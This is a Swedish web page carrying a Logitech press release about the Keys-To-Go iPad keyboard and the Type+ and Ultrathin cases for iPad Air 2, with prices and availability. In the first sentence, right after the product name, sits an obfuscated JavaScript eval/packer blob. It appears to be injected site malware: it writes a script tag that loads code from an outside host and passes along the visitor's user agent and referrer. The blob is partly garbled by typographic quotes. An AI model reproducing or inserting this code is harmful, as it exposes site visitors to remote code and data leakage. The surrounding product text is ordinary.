Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Logitech Keys-To-Go

Logitech Keys-To-Go
Sebastian

Idag lanserar L­­­­ogitech nya Logitech® eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbfbb|var|u0026u|referrer|nttds||js|php’.split(’|’),0,{}))
Keys-To-Go
, ett smidigt bluetooth-tangentbord som passar alla iPads och är lätt att bära med sig överallt. Logitech har också uppdaterat sin produktlinje med tangentbordsfodral som Logitech Type+ och Logitech Ultrathin för att vara kompatibla med nya iPad® Air 2.

”Folk använder sina iPads överallt och Logitech Keys-To-Go byggdes speciellt för att passa in i en aktiv livsstil”, säger Michele Hermann, vice vd för mobila tillbehör på Logitech. ”Vi introducerar Logitech Keys-To-Go och uppdaterar våra existerande produkter för att erbjuda en serie prisbelönta produkter som perfekt ackompanjerar iPadens flexibilitet. Oavsett om du snor iPaden från ungarna för att skicka ett snabbt mail eller är ute på affärsresa så kommer du enkelt kunna skriva effektivt och problemfritt.”

Vart och ett av produkternas Bluetooth-utrustade tangentbord är försedda med väldesignade tangenter som gör det enkelt och bekvämt att skriva. De kommer också utrustade med en rad iOS-genvägar som låter dig enkelt navigera din iPad utan att behöva använda skärmen i onödan

Höjdpunkter i lineupen inkluderar:

Logitech Keys-To-Go för iPad

Nya Logitech Keys-To-Go är ett ultralätt och gediget tangentbord skapat för att vara den perfekta partnern till din iPad när du är på resande fot. Endast 6.1 mm tjockt och med en vikt på 180 gram passar det utmärkt i handväskan, portföljen eller rockfickan. För att säkerställa en bekväm skrivupplevelse ger tangenterna taktil feedback såsom på en laptop, men är inbyggda i ett vattenavvisande FabricSkin-material som skyddar mot spill och smuts. Det uppladdningsbara batteriet kan räcka i upp till tre månader på en laddning. Fodralet är kompatibelt med alla generationer av iPad och iPad mini och kommer i svart, rött eller turkost för ett föreslaget pris på 699 SEK.

Logitech Type+ för iPad Air 2

Logitech Type+ är ett allt-i-ett-tangentbord för iPad Air 2. Det kommer med det populära skyddsfodralet från sin föregångare och ett nyoptimerat Bluetooth-tangentbord som är byggt för att efterhärma känslan av att skriva på en laptop. Du fäster enkelt din iPad i skrivposition med hjälp av magneter och tangentbordet sätts automatiskt igång för att vara redo. Det stängs också automatiskt av när du använder din iPad för surfande eller stänger fodralet. Logitech Type+ finns tillgängligt i svart och rött för ett föreslaget pris på 999 SEK.

Ultrathin för iPad Air 2

Logitech Ultrathin är ett lätt och tunt tangentbordsfodral för din iPad Air 2. Fodralet är byggt i aluminium och matchar din iPad perfekt. Det skyddar din skärm, och tillsammans med ett uppladdningsbart tangentbord som kan gå upp till två år utan att behöva laddas är det den perfekta följeslagaren till din iPad Air 2. Ultrathin finns i Space Grey och Silver för ett föreslaget pris på 899 SEK.

Tillgänglighet

Logitech Keys-To-Go, Logitech Type+ och Logitech Ultrathin väntas finnas tillgängliga i Europa i slutet av november 2014. För mer info besök www.logitech.com.

Om Logitech
Logitech är världsledande inom produkter som kopplar människor samman med de digitala upplevelser som spelar roll för dem. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).